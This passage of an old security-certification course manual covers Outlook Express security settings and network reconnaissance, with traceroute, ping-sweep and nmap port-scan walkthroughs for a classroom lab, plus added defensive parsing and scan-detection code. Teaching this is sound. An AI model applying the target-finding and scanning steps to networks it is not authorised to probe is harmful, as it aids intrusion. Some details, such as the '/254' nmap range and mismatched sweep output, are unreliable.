Outlook Express 6 is the email client that comes bundled with Internet Explorer 6. You can configure Outlook Express (OE) to retrieve and send mail via more than one email server. The current version also enables you to have more than one user account (identity) associated with the client.

You will now look at some of the security issues surrounding this email client.

TASK 7D-15
Basic Security Settings to Take Care of With Your Email Client

1. Double-click your Outlook Express client. If the Internet Connection Wizard is displayed, click Cancel and then click Yes to close the Wizard.

2. Select the Inbox, and observe that it contains a welcome message from Microsoft. When the message is highlighted, you can see a preview of that message in the pane below. As we discussed earlier, these are good intentions that can get exploited. Your first priority should be to turn off this Preview feature.

3. Choose View→Layout.

4. In the lower half of this dialog box, uncheck Show Preview Pane.

5. Click OK.

6. If you’re being spammed and you want to filter this yourself, choose Tools→Message Rules→Blocked Senders List.

7. Click Add. Here, you can specify specific email addresses or domain names that you want to block.

8. Click Cancel twice.

9. Choose Tools→Options.

10. Click the Security tab, and observe the configuration options.

You can specify that OE stay within the Restricted Sites zone.

You can configure OE to warn you if some other application tries to send email as you.

You can configure OE to not allow attachments to be saved or opened that could potentially be a virus (however, most organizations depend on more robust solutions on the mail servers themselves to do such scanning).

You can specify that OE digitally sign and/or encrypt all outgoing messages.

11. Click the Advanced button. You can specify encryption strengths to check for, specify to include your digital ID when sending signed messages, and check for revoked Digital IDs.


12. Click Cancel twice.

13. Choose File→Identities→Add New Identity. Enter a name for the new identity and click OK. When you are prompted to switch to the new identity, click Yes. The Internet Connection Wizard is displayed.

14. Enter any name for yourself, and click Next.

15. Enter any email address for yourself, and click Next.

16. Enter any mail server’s address (IP address or domain name), and click Next.

17. Enter any password.

18. Depending on your mail server, you may have to specify SPA. Leave it unchecked here, and click Next.

19. Click Finish.

Note: Perform step 20 through step 22 only if you entered a live mail server address in step 16.

20. Select the mail server, and click Properties.

21. Click the Security tab. You can specify the strength of the encrypting algorithm to use.

22. Click Cancel, and then click Close.

Note: Perform the following step on all computers.

23. Close all open windows.

Summary

In this lesson, we discussed the physical structure of the Internet and its components. You were introduced to terminologies—such as NSPs, NAPs, and ISPs—and technologies—such as DNS—as they relate to the Internet and security. The common attack points of the Internet were described, as were standard methods of Web hacking. You also looked at the Internet user at risk, and the methods that an attacker can use against individual users. Further, you identified browser security options in extreme detail—every single tab and option available was discussed. You also took a brief look at how to secure your email client.

If you use a hotmail.com account, the steps will be slightly different than listed here.


Lesson Review

7A How many Root DNS servers are there on the Internet, and in how many countries are they distributed?

There are 13 Root DNS servers distributed across four countries.

In what three broad areas of activity is ICANN involved?

DNS support, addressing support, and protocol support.

What qualifications are required for a Tier Two ISP?

Tier-Two ISPs obtain their bandwidth from Tier One and have a local or regional backbone network. They have at least 50,000 subscribers and provide service at a state or national level.

7B List a few methods used by malicious attackers for targeting DNS.

DNS cache poisoning, DNS Server compromise, and DNS response spoofing.

What routing protocol is used on Backbone routers?

BGP or Border Gateway Protocol.

What versions of BIND were susceptible to the Lion worm?

Most BIND versions 8.2.x were susceptible to the Lion worm. This was patched from BIND 8.2.3 and above.

7C What does the CVE mean when it uses numbers prefixed with CAN?

Before vulnerabilities are classified with a CVE prefix (during the research phase), they are classified with a CAN (or CANdidate) prefix.

What does HFNetChk from Microsoft help you do?

HFNetChk enables you to quickly record what hot fixes and/or service packs you have running on your Windows NT or 2000 machine.

What template is recommended by Microsoft to secure a machine that is running IIS 5.0?

Microsoft recommends that you apply the hisecweb.inf template.

7D Under which tab in Internet Explorer’s Internet Options dialog box would you be able to configure the browser to check for publisher’s certificate revocation?

On the Advanced tab, in the Security section.

Describe how you would configure your browser to trust a site.

On the Security tab, select the Trusted Sites zone, click the Sites button, and add the domain name or IP address of the Web site.


You have configured your browser to not accept cookies by default. However, there are certain sites you want to go to that require you to have cookies enabled. Describe how you would configure your browser to allow cookies from such a site.

On the Privacy tab, click the Advanced button. Override the default behavior by specifying Web sites that you want to explicitly accept cookies from.

As an administrator, you need to secure your users’ email client software. What is one of the first and easiest settings to take care of?

Disabling the Preview pane.


Attack Techniques

Overview

In this lesson, you will be introduced to the common techniques used to attack networks and various operating systems. You will follow examples on how to map networks, identify the types of operating systems on the network, and scan for potential holes in those operating systems. You will be introduced to the concepts behind viruses, Trojan Horses, and worms. You will identify the techniques used in password cracking, and you will explore and discuss basic scripting techniques.

Objectives

To become familiar with attacking techniques, you will:

8A Define the process of network reconnaissance.

Given a network scenario, you will describe how to use network reconnaissance to gather information about a target.

8B Map a network with provided tools.

Given a simple network scenario, you will use tracing tools to map the physical layout of a network.

8C Sweep a network with the provided tools.

Given a simple network scenario, you will use network sweeping tools to identify active hosts in a target network.

8D Scan a network with provided tools.

Given a simple network scenario, you will use network scanning tools to determine which ports are open on target computers.

8E Differentiate between a virus, a worm, and a Trojan Horse.

Given a network scenario, you will define how a virus, worm, or Trojan Horse represents a threat and how they are differentiated from one another.

8F Implement a malicious Web site.

In this topic, you will see how ordinary users can be tricked into downloading or running programs on their computers via the Web.

8G Gain control over a network system.

Given a simple network scenario, you will gain control over a system by using Netcat.

Data Files
Malweb folder and contents

Lesson Time
6 hours

LESSON 8

Lesson 8: Attack Techniques 481


8H Record keystrokes with software and hardware.

Given a simple network scenario, you will use software and hardware recording tools to log the keystrokes entered on a keyboard.

8I Crack encrypted passwords on Linux and Microsoft machines.

Given a simple network scenario, you will use tools to crack encrypted passwords on Linux and Windows computers.

8J Reveal passwords hidden by asterisks.

Given a simple network scenario, you will use password-revealing tools to identify hidden passwords.

8K Explore and discuss social engineering techniques.

Given a simple network scenario, you will explore and discuss social engineering techniques used to gather information about and access to a target network.

8L Analyze an example of social engineering.

Given a scenario of social engineering, you will identify the methods used and information gained by an attacker.

8M Investigate potential ways that unauthorized administrator access can be achieved.

You will see how basic programming skills can be used to give a user account administrative privileges on a Windows 2000 network; how physical access to the server, along with another OS and a little advanced knowledge of how Windows works, can be used to compromise an unpatched Windows NT Server; and how a Linux machine can be compromised by booting to single-user mode.

8N Hide the evidence from an attack.

Given a simple network scenario, you will determine ways to hide the evidence of an attack, such as by clearing log files in both Windows and Linux operating systems.

8O Perform a Denial of Service on a target host.

Given a simple network scenario, you will use Denial of Service tools to take a target computer offline.


Topic 8A
Network Reconnaissance

One of the first things to realize is that hacking (cracking, phreaking, and so forth, will all be referred to as hacking in this lesson) is generally a tedious process. It is, in reality, quite unlike the movie visualizations of hacking. It isn’t simply typing in a string of a few numbers and magically gaining access to a network.

For example, what network is the hacker even trying to get into? How did they choose this network? This is where the work can come in. For many hackers, the actual act of network penetration is not the difficult task. It is the task of finding a network to target in the first place.

Finding a Target

Finding a target network can take anything from a very clever and creative mind to simply driving down the street. If the hacker is simply hacking for fun, any business that looks interesting is a good target. If the hacker is trying to challenge himself, then a bit more work is required than a simple drive-by, looking for the neatest looking building.

There are tools available to the potential hacker, although the best tool is the brain. Being able to read the newspapers, hardcopy or online, is how many hackers find their targets. But what are they looking for, or what are they trying to find?

These are some of the questions hackers must answer before they go to work:

• Who/What am I going to hack?

• Why am I going to hack?

• What am I looking for if access is gained?

Without knowing the answers to these questions ahead of time, the hacker is doomed to failure.

Assuming that the basic questions are answered, the hacker begins the reconnaissance. One of the primary areas to go for potential targets is to a newsgroup. New network administrators will practically give away their network contents in a newsgroup to someone who seems helpful.

For many hackers, newsgroup browsing is like fishing. Perhaps you need to wade through hundreds of messages, but if you wait long enough, you will get a bite. Be wary of posting too much information or real IP addresses in a newsgroup, even if it is a strongly moderated group.

If there is no useful data in the newsgroups on a given day, another valuable resource for the hacker is to search the SEC (Securities and Exchange Commission). The SEC has records on all recent business mergers and acquisitions. Searching through the press releases of various business mergers and modifications may be all that a hacker needs to identify a potential target.

phreaking: The art and science of cracking the phone network.

penetration: The successful unauthorized access to an automated system.

Common newsgroups that hackers may browse are any groups related to administration, security, and protocols.


Figure 8-1: The SEC Web site.

The usefulness of this information is varied. But in many situations, when a large company takes over or buys out a smaller company, one of the first issues is connectivity between companies. Much of the time, security is loosened a bit to ensure that all employees in every location can communicate.

It is during this loose period that the hacker may sneak in an open hole in the network. The hacker will attack the smaller company in hopes that the security is lowered, which it usually is, compared to the bigger company. By finding a weak point in the smaller company and exploiting it before the merger is complete, the hacker can gain a back door entry into the larger company.

If a potential company has been found via an SEC search or by other means, the next step is to find out more information about the company. The SEC filing is usually quite comprehensive as far as the amount of data it reveals; however, there are other places to go to gain further knowledge.

Who is the Target?

The next place to go to learn about a company is their Web site registration information. This information is easily available, and in some instances contains incredible amounts of data about the company. Common registration searches are located at the following Web sites:

• General searches: www.internic.com/alpha.html.

• The U.S. military directories: http://whois.nic.mil.

• The U.S. government directories: http://whois.nic.gov.

back door: A hole in the security of a computer system deliberately left in place by designers or maintainers. Synonymous with trap door; a hidden software or hardware mechanism used to circumvent security controls.


Figure 8-2: An example of a search lookup tool.

A search through one of these directories can reveal information such as the physical address of the company, the name of the person who owns the DNS domain name, the name of the network administrator, the company phone number, the company fax number, the email addresses of administrators, the DNS servers that the company (or at least the Web site) uses, the ISP that the company uses, other domain names the company owns, the IP address range assigned to the target company, and more. See Figure 8-3 for an example of a Whois output.


Figure 8-3: The output results from running a Whois lookup on the Web site NetworkSolutions.com, one of the most popular registration sites on the Internet.

Information learned from the Whois lookup includes:

• Registrar: This defines who the actual person or company is that owns the domain name.

• Mailing Addresses: This defines the mailing and/or the physical address of the business or person who owns the name.

• Contact Names: This defines the person(s) responsible for billing and/or administrative functions of the domain name. At times, this will also list the actual email addresses and phone numbers of the contact names.

• Record Updates: This defines the last time the record was updated, and when it expires.

• Network Addresses: This defines the IP addresses associated with the domain name.

• DNS Server Addresses: This defines the DNS servers responsible for the domain name.

Studying the Message Source

A follow up would be to send an email to a made-up address, something that will be returned as an unknown recipient. Then, the message source can be studied, to learn the details about the email servers used in the target network. See Figure 8-4 for an example of reading the message source of an email message.


Figure 8-4: An example of the message source of an email message.

In Figure 8-4, you can see that a hacker can learn the names of the email servers inside the potential target network—in this case: mailserver.securitycertified.net. The hacker learns that the private IP address being used is 192.168.23.45. This may indicate the address range used inside the company. Other message sources can reveal public IP addresses, as well as the names (and even the naming schemes) of the company’s routers. All of this information can be learned via a simple returned email message.

So, in a matter of minutes, a hacker using registration searches and a bogus email can learn quite a bit of information about the potential target. Try this for your own company this coming weekend, and see what you can learn. You may be able to learn details you did not know, even though you work there!

One of the above items that needs to be addressed is the other domain names a company might own. Often, the smaller satellite sites have looser security implementations, and may be the starting point for an attack. If the company owns many sites and they are all active, they all need to be secured, not just the primary one.

After this initial network reconnaissance has been completed and a potential target network has been identified, the hacker must next learn all of the details possible about this target network.


Topic 8B
Mapping the Network

With the potential target network identified, the next phase a hacker needs to complete is to map the network. What this means is to identify the topology of the network and to identify as many of the nodes possible by their IP addresses and their position in the network.

There are many tools available to the network security professional to manage their networks. Some of these tools are free, while others have costs associated with them. The very same tools that are used by the administrators and security professionals are used by hackers in trying to map out potential target networks.

Using Traceroute

The standard free tool that most hackers have to use for network mapping is the traceroute utility. Traceroute is included in most versions of UNIX, Linux, Windows NT, and Windows 2000. Traceroute is a simple and highly effective tool for defining the path that packets are taking across the network from node to node. Written to use the Time To Live field (TTL) of an IP packet, traceroute elicits ICMP TIME-EXCEEDED messages from each node. For each router (or node) the packet passes through, the TTL is lowered by one. This has the net effect of allowing the TTL field in the packet to become the hop count.

Using Traceroute allows for identification of the routers on a given network and provides information as to their filtering properties. It is not uncommon for firewalls to block traceroute from passing through. Knowing this information, a hacker is able to make an educated guess as to which IP addresses are firewalls and which are routers.

The UNIX (and Linux) implementations of traceroute use UDP (User Datagram Protocol) packets as the default, but they do have the option to use ICMP (Internet Control Message Protocol) packets via the -I switch. Windows NT (and 2000) use ICMP echo request packets by default.

Using tracert on Windows

The following is an example of a trace completed on a Windows 2000 computer:

C:\>tracert 10.0.10.100

Tracing route to 10.0.10.100 over a maximum of 30 hops:

  1   <10 ms   <10 ms   <10 ms  192.168.15.1
  2    70 ms    81 ms    71 ms  isp1.net [172.16.31.1]
  3    54 ms    37 ms    48 ms  isp2.net [169.254.48.100]
  4    61 ms    73 ms    65 ms  isp3.net [10.0.10.57]
  5    27 ms    29 ms    25 ms  10.0.10.100

network security: Protection of networks and their services from unauthorized modification, destruction, or disclosure, and provision of assurance that the network performs its critical functions correctly and there are no harmful side effects. Network security includes providing for data integrity.

Mapping Tools

The traceroute program is spelled “tracert” in Windows operating systems to follow the 8.3 naming convention.


TASK 8B-1
Using Windows Tracing Tools

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Open a command prompt, and enter tracert 172.17.10.1 to trace the route to the specified IP address.

2. View the results, paying particular attention to:

• Time between hops

• Addresses resolved

• Overall number of hops

3. Close the Command Prompt.

Using traceroute on Linux

Linux also has tracing tools included. The executable is named traceroute on Linux operating systems. The following is an example of Linux tracing:

[lnx1]$ traceroute 10.0.10.100
traceroute to 10.0.10.100 (10.0.10.100), 30 hops max, 40 byte packets
 1  dg1 (192.168.15.1)  7.933 ms  8.719 ms  8.211 ms
 2  isp1 (172.16.31.1)  68.762 ms  79.204 ms  72.659 ms
 3  isp2 (169.254.48.100)  56.843 ms  37.026 ms  47.242 ms
 4  isp3 (10.0.10.57)  61.845 ms  73.407 ms  64.921 ms
 5  10.0.10.100 (10.0.10.100)  27.721 ms  29.285 ms  26.387 ms
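The two listings above print the same hop data in different layouts. The following is an added example (not part of the course text) that parses both the tracert and the traceroute format into one structure and then reports the two things a defender reviewing a trace of their own network looks for: hops that never answer (a filtering router or firewall) and large latency jumps between hops. The sample traces are constructed copies of the page's listings.

```python
"""Parse Windows tracert and Linux traceroute output into one hop list.

Added example, not from the SCP course; the two sample traces below are
constructed copies of the page's Windows and Linux listings.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

@dataclass
class Hop:
    number: int
    address: Optional[str]   # IP printed for the hop, None if nothing answered
    name: Optional[str]      # resolved host name, None if unresolved
    rtts_ms: List[Optional[float]] = field(default_factory=list)  # None = "*"

_RTT = re.compile(r"^<?(\d+(?:\.\d+)?)(ms)?$")   # "70", "<10", "7.933", "70ms"
_NAME_ADDR = re.compile(r"^(\S+)\s+[\[(](\d{1,3}(?:\.\d{1,3}){3})[\])]$")
_ADDR_ONLY = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

def _take_rtt(tokens, i):
    """If tokens[i] starts a probe result, return (rtt, next index); '*' gives
    rtt None. Return None when the token belongs to the host field instead."""
    if tokens[i] == "*":
        return None, i + 1
    m = _RTT.match(tokens[i])
    if m and m.group(2):                       # unit attached: "70ms"
        return float(m.group(1)), i + 1
    if m and i + 1 < len(tokens) and tokens[i + 1] == "ms":
        return float(m.group(1)), i + 2
    return None

def parse_trace(text: str) -> List[Hop]:
    """Accept either tool's output; prompt and banner lines are skipped."""
    hops = []
    for line in text.splitlines():
        tokens = line.split()
        if not tokens or not tokens[0].isdigit():
            continue
        rtts, host_tokens, i = [], [], 1
        while i < len(tokens):
            taken = _take_rtt(tokens, i)
            if taken is None:
                host_tokens.append(tokens[i])
                i += 1
            else:
                rtt, i = taken
                rtts.append(rtt)
        # Host field is "isp1.net [172.16.31.1]" (Windows), "dg1 (192.168.15.1)"
        # (Linux), a bare address, or "Request timed out." when nothing answered.
        host = " ".join(host_tokens)
        name = address = None
        m = _NAME_ADDR.match(host)
        if m:
            name, address = m.group(1), m.group(2)
            if name == address:                # Linux repeats the IP if unresolved
                name = None
        elif _ADDR_ONLY.match(host):
            address = host
        hops.append(Hop(int(tokens[0]), address, name, rtts))
    return hops

def silent_hops(hops: List[Hop]) -> List[int]:
    """Hops where every probe timed out: how a filtering firewall shows up."""
    return [h.number for h in hops if h.rtts_ms and all(r is None for r in h.rtts_ms)]

def latency_jumps(hops: List[Hop], threshold_ms: float) -> List[Tuple[int, int, float]]:
    """(earlier hop, hop, increase) wherever the best RTT grows by more than
    threshold_ms since the last hop that answered: a WAN link or a slow device."""
    jumps, last_number, last_best = [], None, None
    for h in hops:
        answered = [r for r in h.rtts_ms if r is not None]
        if not answered:
            continue
        best = min(answered)
        if last_best is not None and best - last_best > threshold_ms:
            jumps.append((last_number, h.number, best - last_best))
        last_number, last_best = h.number, best
    return jumps

WINDOWS_TRACE = """\
Tracing route to 10.0.10.100 over a maximum of 30 hops:
  1   <10 ms   <10 ms   <10 ms  192.168.15.1
  2    70 ms    81 ms    71 ms  isp1.net [172.16.31.1]
  3    54 ms    37 ms    48 ms  isp2.net [169.254.48.100]
  4    61 ms    73 ms    65 ms  isp3.net [10.0.10.57]
  5    27 ms    29 ms    25 ms  10.0.10.100
"""

LINUX_TRACE = """\
traceroute to 10.0.10.100 (10.0.10.100), 30 hops max, 40 byte packets
 1  dg1 (192.168.15.1)  7.933 ms  8.719 ms  8.211 ms
 2  isp1 (172.16.31.1)  68.762 ms  79.204 ms  72.659 ms
 3  isp2 (169.254.48.100)  56.843 ms  37.026 ms  47.242 ms
 4  isp3 (10.0.10.57)  61.845 ms  73.407 ms  64.921 ms
 5  10.0.10.100 (10.0.10.100)  27.721 ms  29.285 ms  26.387 ms
"""
```

A Windows hop that prints "Request timed out." yields three None probes and no address, so silent_hops() reports it; feed parse_trace() the saved output of a trace against your own perimeter to see which hop your firewall occupies.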

Using Graphical Tracing Tools

In addition to the tools that ship with both Windows and Linux operating systems, there are many commercially available tools for tracing. Two of these tools can be tried as downloadable evaluation copies and purchased later if desired:

• VisualRoute, found at www.visualroute.com.

• NeoTrace, found at www.neotrace.com.

Each of these tools provides for graphical mapping of the data path and much more. In addition to providing an actual image of the route, these tools can perform functions such as Whois lookups, the physical location of each hop, time between hops, and more.


Figure 8-5: An example of using Visual Route.

Another tool, in the same category as VisualRoute, is NeoTrace. In a slightly different visual format, these two tools are designed to show the network on-screen during the trace.

A useful, or at least interesting, option available when you are using NeoTrace, if you have an Internet connection, is to show either a map or a satellite image of the location you are tracing to (or any of the nodes in between).


Figure 8-6: An example of using NeoTrace.

TASK 8B-2
Using VisualRoute

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Copy the VisualRoute installation program from the location provided by your instructor to your desktop. Double-click the installation program, and follow the prompts to install VisualRoute in the default location.

2. Start the VisualRoute program. It should be found in the Start menu,under Programs. Select English as the language, if necessary.

3. In the Enter Host/URL text box, enter the IP address of another computer in your class, such as 172.17.10.1.

4. Select the link and view the results, paying particular attention to the following:

• Time between hops

• Addresses resolved

• Overall number of hops

5. Close VisualRoute and any other open windows.

Provide students with the location of the VisualRoute installation files.


Topic 8C
Sweeping the Network

Once the basic mapping of the target network has been completed with the given tools such as NeoTrace Pro, Visual Route, and traceroute, the hacker will need to get more details about the target nodes that are in the network. This is where network scanning comes into play. By using a network scanner of a given type, the hacker can start to identify the potential target machines inside the network. The potential target has been identified, now it is time to start to look for a potential entry point.

The different options for learning about a network include:

• Network ping sweeps

• ICMP queries

• Automated discovery tools

• Operating system detection

Ping Sweeping

Network ping sweeps are used to determine which of the remote hosts on a given segment are active. The concept is somewhat simple, yet effective:

1. Ping a given range of hosts.

2. The hosts that respond are determined to be the ones that are active.

3. The hosts that do not respond are assumed not active.

4. By looking at the list of responding hosts, the hacker can determine what the active range of IP address is.

The ping sweep method is effective, but it is worth noting that an administrator can have hosts configured to not respond to different types of ping, as you will see later. If the ping sweep is not producing the results the hacker is looking for, he or she will simply modify the properties of the sweep to try different attempts.

The default operation of ping is to issue an ICMP ECHO packet request to the remote host. The remote host would then return an ICMP ECHO_REPLY packet, which indicates nothing more than the remote node is on and responding.

There are ping sweep utilities made, so the hacker does not have to enter each possible address manually. Take care when defining the IP addresses for a ping sweep. If the broadcast address for a segment is included in the sweep, a denial of service may result. Also, try not to perform such scanning while on the Internet; someone may complain, and your ISP may cut you off.

Linux Ping Sweeping with the fping/gping Tool

The common ping sweep for UNIX/Linux is called fping/gping. Gping generates the list of potential addresses and submits that information to fping. Fping then performs the ping function and sends the output to a text-readable file that identifies active hosts.


A major benefit in the operation of fping/gping is the speed at which the commands complete. In a traditional sense, using ping means send one packet to the remote host, wait for the response, and then proceed to the next host. As you can see, following this method will take quite some time if there are hundreds or thousands of nodes to ping. Fping/gping is able to speed up this process by submitting a mass request out to the network in parallel. This rather simple approach is quite effective, as shown here:

[Server] $ gping 192 168 1 1 254 | fping -a
192.168.1.207 is alive
192.168.1.7 is alive
192.168.1.48 is alive
192.168.4.52 is alive
...

Linux Ping Sweeping with the nmap Tool

One of the most used and most respected network tools is nmap. Written by an individual named Fyodor, this is one tool that all security professionals are comfortable with. In this section, we will investigate only one area of nmap, but this is one tool you will see several times. The following example of nmap is being used to locate active hosts:

[Server] $ nmap -sP 192.168.1.0/254
Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Host (192.168.1.1) appears to be up.
Host (192.168.1.7) appears to be up.
Host (192.168.1.48) appears to be up.
Host (192.168.4.52) appears to be up.
...

Windows Ping Sweepers

Windows users are not left behind when it comes to ping sweep utilities. These function via a command prompt or a GUI and present the results in the responding window. They work on the same premise, by filling a starting and ending address, then telling the program to sweep. Examples of common Windows ping sweepers are Pinger, SuperScan, and Ping Sweep. (Ping Sweep is part of a professional set of networking tools from SolarWinds, solarwinds.net.)

Pinger

Pinger is a fast, efficient, and lightweight Windows tool for network ping sweeps. After you define the starting and ending IP addresses, followed by options such as number of passes and name resolution, Pinger is able to complete its task quickly.


Figure 8-7: An example of Pinger before IP addresses are defined.

SuperScan

SuperScan is another tool like nmap that has many more functions than simply identifying active hosts. We will return to SuperScan later in the course, but for now will focus on the active host identification option. See Figure 8-8 for the SuperScan default window.


Figure 8-8: SuperScan in default mode, before a scan begins.

TASK 8C-1
Using SuperScan

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Copy the SuperScan installation program from the location provided by your instructor to the desktop. Then double-click it and follow the prompts to install SuperScan in the default location. The program automatically starts when the installation is complete.

2. In the IP Start and Stop text boxes at the left of the screen, enter the starting IP address of your portion of the class network and the ending IP address of the network. For instance, if you are on the LEFT side of the room, you might enter 172.16.0.1 through 172.16.10.6.

3. Under Scan Type, select Ping Only.

4. Verify that Resolve Hostnames is checked.

5. Verify that Show Host Responses is checked, even though it is grayed out.

6. Click Start to begin the scan. Because SuperScan pings every possible address, the scan takes a while to complete.

7. Observe the responses from the other hosts in the room as they are displayed in the GUI.

Provide students with the location of the SuperScan installation file.


8. If possible, try to observe the activity on the hubs or switches in the class during this activity.

9. Close SuperScan.

Topic 8D
Scanning the Network

Now that you’ve identified potential target hosts to hack, you need to find out how to get into these targets. One way to do this is to identify open ports on the target hosts.

Port Scanning

Port scanning is also the primary method used to identify potential targets in the event that an administrator has disabled ICMP at the firewall. Even if a host does not respond to a ping request, that node may be active, and the port scan can identify this host in hiding.

Port scanners have several different methods of operation. Based on the input type, the scanners may use these different methods to avoid detection. A few of the options they can run as are:

• TCP connect scan. The TCP connect scan makes a full three-way-handshakelevel connection to the remote host. Since a full connection is created, thistype of scan is easy to detect.

• TCP SYN scan. The TCP SYN scan makes only a half-open connection.This scan steps part of the way through the three-way handshake, only longenough to receive the request to SYN. Once the request is made, the scannercan assume this port is open and not respond with the full connection. TheTCP SYN scan is harder to detect than the full connect scan.

• TCP ACK scan. The TCP ACK scan works on a similar premise as the SYNscan in that it does not establish a full connection with the target host. TheACK scan can tell the hacker if the firewall is only accepting full connec-tions, or if it is performing more detailed controlled filtering.

Three other scan types are based on the principles of RFC 793, which states howthe target system should respond with RST messages:

• TCP FIN scan. The TCP FIN scan sends a FIN packet to the given port, andthe remote node will respond with a RST for closed ports. This scan worksbest on UNIX TCP/IP stack implementations.

• TCP Null scan. The TCP Null scan sets all flags to off, and the remote noderesponds with a RST message for all closed ports.

• TCP Xmas Tree scan. The TCP Xmas Tree scan sends a PUSH, FIN, andURG packet to the target port, which the remote node will respond with aRST for all closed ports.
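Each scan type above is defined by the flags it sets, which is also what an Intrusion Detection System keys on. The following Python example, added here and not part of the course materials, classifies inbound TCP segments by that flag pattern and reports any source whose probe-shaped segments touch more distinct ports than a threshold. The segment records are constructed sample data, and the threshold of ten ports is an assumption.

```python
from collections import defaultdict
from dataclasses import dataclass

# TCP flag bits as laid out in the header (RFC 793)
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20


@dataclass(frozen=True)
class Segment:
    """One inbound TCP segment, reduced to the fields the detector needs."""
    src: str
    dst: str
    dport: int
    flags: int


def classify_probe(flags: int) -> str:
    """Name the scan technique a lone inbound segment is consistent with.

    A bare SYN is also the first step of an ordinary connection and a bare ACK
    occurs in every established flow, so neither is suspicious on its own; the
    distinct-port count in detect_port_scans() is what makes them meaningful.
    """
    if flags == 0:
        return "null"
    if flags == FIN:
        return "fin"
    if flags == (FIN | PSH | URG):
        return "xmas"
    if flags == SYN:
        return "syn"
    if flags == ACK:
        return "ack"
    return "other"  # data segments, SYN/ACK, RST, ...: not probe-shaped


def detect_port_scans(segments, port_threshold: int = 10) -> dict:
    """Return {source_ip: {"ports": n, "techniques": [...]}} for every source
    whose probe-shaped segments touched more than port_threshold distinct
    (destination, port) pairs.  The threshold is an assumption; tune it to
    the traffic you actually see."""
    targets = defaultdict(set)
    techniques = defaultdict(set)
    for seg in segments:
        kind = classify_probe(seg.flags)
        if kind == "other":
            continue
        targets[seg.src].add((seg.dst, seg.dport))
        techniques[seg.src].add(kind)
    return {
        src: {"ports": len(pairs), "techniques": sorted(techniques[src])}
        for src, pairs in targets.items()
        if len(pairs) > port_threshold
    }


# Constructed sample: one host sweeping ports 1-20 with Null probes and then a
# few FIN probes, alongside a normal client fetching a page from port 80.
SAMPLE_SEGMENTS = (
    [Segment("10.0.0.9", "10.0.0.5", p, 0) for p in range(1, 21)]
    + [Segment("10.0.0.9", "10.0.0.5", p, FIN) for p in (21, 22, 23)]
    + [
        Segment("10.0.0.7", "10.0.0.5", 80, SYN),
        Segment("10.0.0.7", "10.0.0.5", 80, ACK),
        Segment("10.0.0.7", "10.0.0.5", 80, ACK | PSH),
    ]
)


def run_sample() -> dict:
    """Run the detector over the constructed sample."""
    return detect_port_scans(SAMPLE_SEGMENTS)


if __name__ == "__main__":
    for src, info in run_sample().items():
        print(f"{src}: {info['ports']} ports probed using {', '.join(info['techniques'])}")
```

The detector never alerts on a flag pattern alone; it is the fan-out across many ports from one source that separates a sweep from a client, which is also why a slow scan spread over hours needs a longer observation window than a single pass over a capture.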

Scanning the Network

Port scanning an entire network segment can consume high amounts of bandwidth and can be very time consuming.

Most Intrusion Detection Systems will detect port scans while they are scanning.


The netstat Tool

Although there are many tools for scanning, it is important to not forget the built-in utilities offered in operating systems. One example is netstat in Windows. Figure 8-9 shows the possible switches that can be used with netstat. Netstat is a powerful tool, but has a limitation in that it does not identify the program or service that is listening on a port, only that the port is open.

Figure 8-9: Netstat switch options.

Pay close attention to a few of the more often used switches, such as:

• -a, which shows all connections and listening ports.

• -e, which displays statistics such as Unicast packets sent and received.

• -s, which displays statistics on a per-protocol basis.

Service Identification

Although learning which nodes on the target network are active is important, and using network scanning and sweeping will divulge this information, the hacker is concerned with learning even finer levels of detail.

The hacker wants to know what services are running on the potential targets. Knowing the number of services that are active, and what they are designed to do, will make the hacker's entry attempts much more likely to succeed.

The tools you used in the previous topics will be taken a step further here. Most of the same tools we have already looked at, such as nmap and SuperScan, can also be used to identify the active ports.

Two other well-known port scanners are Strobe and Netcat. Strobe is an efficient port scanner that is limited to scanning TCP ports, so if UDP ports are the target, a different tool must be selected. Additionally, Strobe uses the TCP full connect method, meaning that Intrusion Detection Systems will pick it up quickly. See Figure 8-10 for an example of Strobe in operation.

Scanning Tools


Figure 8-10: Strobe's available options.

A utility we have seen before—nmap—also has great port-scanning and service-identification options. It has the built-in ability to scan both TCP and UDP ports, as seen in Figure 8-11. There are too many nmap switches to list here, so once it is running, you will want to be sure to check the associated help file. A few of the significant switches are:

• -sT: TCP connect() port scan (default)

• -sS: TCP SYN stealth port scan (best all-around TCP scan)

• -sU: UDP port scan

• -sP: ping scan (find any reachable machine)

• -sF, -sX, -sN: Stealth FIN, Xmas, or Null scan (experts only)

Figure 8-11: Using nmap to port-scan a network host.


TASK 8D-1: Using nmap

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Log in to Linux as root.

2. Open a Terminal Window.

3. Enter nmap -sS x.x.x.x, where x.x.x.x is any IP address in the classroom network.

4. View the results, noting the open ports and their associated services.

5. Close all open windows.

Windows Port Scanners

Although we have just used Linux tools for the last exercise, Windows users are not without port scanning tools. From professional tools such as NetScan Tools Pro 2001, to free programs like SuperScan and WinScan, as well as Nmapnt (a version of nmap for NT), the whole spectrum of network scanning is covered.

NetScan Tools Pro 2001 is one of the most comprehensive administrative tools for understanding a network. Available options include ping sweeps, port scanning, traceroute, whois lookups, and more. See Figure 8-12 for an example of the options in NetScan Tools Pro.

Figure 8-12: The options available in NetScan Tools Pro 2001.


SuperScan, which was used in earlier exercises, also has more options than simple ping sweeping. With SuperScan, the options are presented to port-scan by a given range of numbers, all port numbers, or specific lists. It is the specific-list feature that comes in handy. There are predesigned port lists for scanning, and lists can be customized. Figure 8-13 and Figure 8-14 show SuperScan in use.

Figure 8-13: An example of SuperScan during a scan. Nodes with plus signs next to their IP addresses have open ports.

Figure 8-14 shows SuperScan after the scan is complete.


Figure 8-14: An example of SuperScan after a scan has been completed. Notice the node that has been expanded to reveal the open ports.

TASK 8D-2: Using SuperScan

Setup: You are logged in to Linux as root.

1. Log on to Windows 2000 as the renamed Administrator account.

2. Start the SuperScan program.

3. In the IP Start and Stop text boxes, enter the starting and ending IP addresses of your portion of the classroom network.

4. Under Scan Type, select All Ports From.

5. Set Port Values from 1 to 1024.

6. Leave Show Host Responses checked.

7. Start the scan.

8. Observe the responses from the other hosts in the room as they are displayed in the GUI. If possible, try also to observe the activity on the hubs or switches in the class during this activity.


